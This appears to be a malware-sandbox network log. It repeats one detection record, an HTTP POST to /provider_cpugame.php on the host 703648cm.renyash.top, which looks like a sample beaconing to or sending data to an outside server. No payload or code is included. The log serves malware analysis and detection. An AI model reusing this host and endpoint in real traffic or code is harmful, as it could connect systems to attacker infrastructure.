                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 204424Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global traffic HTTP traffic detected: POST /provider_cpugame.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 703648cm.renyash.top Content-Length: 2204 Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
